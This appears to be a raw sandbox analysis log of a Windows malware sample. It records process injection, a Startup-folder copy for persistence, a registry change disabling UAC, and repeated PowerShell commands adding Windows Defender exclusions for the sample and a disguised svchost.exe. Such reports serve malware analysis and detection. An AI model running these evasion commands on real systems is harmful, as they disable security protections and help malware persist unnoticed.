Token: SeDebugPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2056 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 2056 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 2056 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 2056 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 1680 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 1680 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 1680 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 1680 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 2056 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2056 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2056 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2056 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2056 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 1528 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 1528 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 1528 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 1528 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2524 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2524 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2524 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe" /SpecialRun 4101d8 1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe" /SpecialRun 4101d8 1528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

